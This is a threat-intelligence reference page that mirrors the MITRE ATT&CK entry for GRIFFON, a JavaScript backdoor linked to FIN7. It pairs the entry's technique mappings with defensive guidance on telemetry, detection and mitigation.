S0417: GRIFFON
Analyst context for executives and security teams
GRIFFON matters because it is a Windows JavaScript backdoor associated in ATT&CK with FIN7, a financially motivated group. For leaders, the practical concern is not the malware name alone, but the set of behaviors ATT&CK links to it: script-based execution, PowerShell use, persistence through scheduled tasks or startup locations, host and domain discovery, and screen capture. Those behaviors test whether the organization can see and investigate suspicious scripting activity before it becomes a longer-running intrusion.
Executive priority
Prioritize validation of Windows endpoint visibility and response readiness around script execution and persistence. This object is especially relevant for organizations assessing exposure to financially motivated intrusion activity and for teams that need audit-ready evidence that scheduled task changes, Run key/startup folder changes, PowerShell activity, domain group discovery, and screen capture-like behavior are monitored and triaged. Executives should ask whether SOC playbooks connect these signals into an intrusion story rather than handling them as isolated low-confidence alerts.
Technical view
ATT&CK provides no dedicated detection text for GRIFFON, so defenders should build coverage from the linked behaviors: T1053.005 Scheduled Task, T1059.001 PowerShell, T1059.007 JavaScript, T1069.002 Domain Groups, T1082 System Information Discovery, T1113 Screen Capture, T1124 System Time Discovery, and T1547.001 Registry Run Keys / Startup Folder. On Windows, validate telemetry for script hosts and PowerShell process activity, task creation or modification, autorun registry/startup folder changes, command patterns that enumerate domain groups or system details, and unusual screenshot-related collection from nonstandard processes. Treat relationship-driven detections as behavioral hypotheses requiring local baselining and investigation context.
Likely telemetry
- Windows process creation and command-line telemetry for PowerShell, JavaScript/JScript/script host execution, and discovery commands
- PowerShell logging where available, including script block/module or equivalent execution details
- Windows Task Scheduler creation, modification, and execution events
- Registry monitoring for Run key changes and file monitoring for startup folder additions
- Endpoint telemetry showing domain group enumeration and system information/time discovery activity
Detection direction
- Correlate script execution with persistence changes, especially PowerShell or JavaScript activity followed by scheduled task creation or Run key/startup folder modification.
- Baseline legitimate administrative use of PowerShell, scheduled tasks, and domain group queries to reduce false positives without suppressing rare or newly observed combinations.
- Look for discovery activity occurring soon after script execution, including domain group enumeration, system information collection, and system time checks.
- Review whether screen capture detections exist at all; many environments lack reliable coverage for this behavior unless EDR or detailed host telemetry is deployed.
- Because ATT&CK does not provide GRIFFON-specific detection guidance, avoid relying on signatures alone; validate behavior-based detections mapped to the related techniques.
Mitigation priorities
- Harden and monitor Windows scripting environments, including governance for PowerShell and JavaScript/JScript execution where operationally feasible.
- Restrict who can create scheduled tasks and modify autorun locations, and alert on changes outside known software management paths.
- Apply least privilege for user and administrative accounts so discovery of domain groups does not easily lead to privileged access decisions by an adversary.
- Maintain endpoint logging and EDR retention sufficient for incident response reconstruction across execution, persistence, discovery, and collection behaviors.
- Document detection and response coverage as compliance evidence, including what telemetry is collected, retained, and reviewed for the related ATT&CK techniques.
Analyst notes and limits
The strongest decision value comes from the relationships rather than the malware description itself. GRIFFON is described by ATT&CK as a JavaScript backdoor used by FIN7, and FIN7 is described as financially motivated with targeting across multiple industries. Local risk prioritization should consider whether the organization has Windows endpoints, valuable credentials, and business processes where stealthy script-based persistence would materially affect operations.
The supplied ATT&CK object has no official detection text, no malware aliases, and no object-level tactics. The FIN7 relationship context is truncated, and technique descriptions are general ATT&CK descriptions rather than GRIFFON-specific procedures. This take therefore avoids claims about current activity, prevalence, impact, or guaranteed detection and requires environment-specific validation.
GRIFFON
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1113 | Screen Capture | GRIFFON has used a screenshot module that can be used to take a screenshot of the remote system.CitationSecureList Griffon May 2019 |
| Enterprise | T1069.002 | Domain Groups Sub-technique | GRIFFON has used a reconnaissance module that can be used to retrieve Windows domain membership information.CitationSecureList Griffon May 2019 |
| Enterprise | T1124 | System Time Discovery | GRIFFON has used a reconnaissance module that can be used to retrieve the date and time of the system.CitationSecureList Griffon May 2019 |
| Enterprise | T1059.007 | JavaScript Sub-technique | GRIFFON is written in and executed as JavaScript.CitationSecureList Griffon May 2019 |
| Enterprise | T1082 | System Information Discovery | GRIFFON has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .CitationSecureList Griffon May 2019 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.CitationSecureList Griffon May 2019 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | GRIFFON has used |
| Enterprise | T1059.001 | PowerShell Sub-technique | GRIFFON has used PowerShell to execute the Meterpreter downloader TinyMet.CitationSecureList Griffon May 2019 |
Groups, software, and campaigns
G0046: FIN7
FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately.[1][2][3][4][5][6][7]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 9a4c6fe01bc4… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
SecureList Griffon May 2019
Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.
Open source URL -
[2]
mitre-attack S0417Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.